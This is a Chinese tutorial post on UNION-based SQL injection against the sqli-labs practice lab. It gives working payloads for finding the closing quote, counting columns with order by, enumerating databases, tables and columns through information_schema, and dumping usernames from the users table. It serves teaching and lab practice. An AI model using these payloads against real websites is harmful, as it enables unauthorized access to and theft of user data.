关于闭合符号怎么判断
可以使用来探测闭合,报错信息中后的符号即为闭合符号
用sqli第一关举例我们可以看到后是’,所以可以判断本关的闭合是’
union联合注入
(union注入条件:union用于合并多个select语句的结果,所有他呀求内部的select语句要拥有相同数量的列,列也要是相似的数据类型)
id=1’如果报错,那么就存在注入点,可以在使用id=1' and 1=1#
和id=1' and 1=2#
判断,如果注入存在,那么id=1' and 1=2#
会报错(有闭合说明是字符型,数字型就没得闭合了,并且输入数据错误,比如id=1-,如果后面没有闭合符,sql会自动矫正)
id=1' and 1=1--+执行
id=1' and 1=2--+报错
判断存在注入后,开始判断有多少表,使用order by
判断(也可以使用group by
,方法是一样的)
使用id=1' order by 10--+
,他告诉我们没有那么多,我们可以试试折半去找
使用id=1' order by 5--+
也没有5个那么多,那我们试试3,使用id=1' order by 3--+
显示出来了,为了避免漏下,我们试试4,结果报错了,说明只有三个表
判断完有几个表,那我们就要看看这个字段的显示位置在哪了,我们可以给id一个不存在的值,比如-1
、a
、9999999
等
这里采用union注入 id=-1'union select 1,2,3--+
,1,2,3为刚才探测到的字段 ,可以看到字段二在login name后,字段3在password后
然后就可以查看他都有什么数据库了id=-1'union select 1,2,group_concat(schema_name) from information_schema.schemata--+
翻译一下group_concat(schema_name) from information_schema.schemata--+
group_concat()
:是将查询到的结果合并,结果和结果之间用逗号隔开 。
information_schema
:是mysql自带的一个信息数据库包含了mysql维护的其他数据库的信息
schemata
:是information_schema库下的一个表,存放了当前数据库下的所有数据库,效果等同于showdatabase
schema_name
:schemata表中的列,包含了当前数据库管理系统中所有的数据库名
直译过来大概就是打印information_schema库中schemata表schema_name列
information_schema数据库只存在于MySQL5.0之后,5.0之前只能使用access字典暴力破解的方式
在information_schema数据库中还可以利用的表:
schema_name
储存了所有数据库的库名table_schema
储存了数据库名tables
储存了数据库库名,以及该库中包含的表名,table_schema
储存了数据库名table_name
储存了表名
具体可参考:博客 官方文档
我们还可以在这查询数据库的一些信息,比如查询我们当前的数据库以及版本信息id=-1' union select 1,database(),version()--+
,我们可以看到当前的数据库是security,mysql版本为5.7.26
version()
:查看数据库版本
database()
:查看使用的数据库
user()
:查看当前用户
limit
:limit子句分批来获取所有数据
group_concat()
:一次性获取所有的数据库信息
我们知道了数据库,然后开始查看表名id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
翻译一下id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
,大部分语句在前面已经翻译过,从information_schema数据库中的tables表中执行database()
然后我们要获取表中的所有的字段,这边选择获取users表中的字段,因为users表中存储的是用户数据id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users') --+
最后,获取字段中的所有数据id=0' union select 1,2,(select group_concat(username) from security.users) --+
原创文章,作者:guozi,如若转载,请注明出处:https://www.sudun.com/ask/88529.html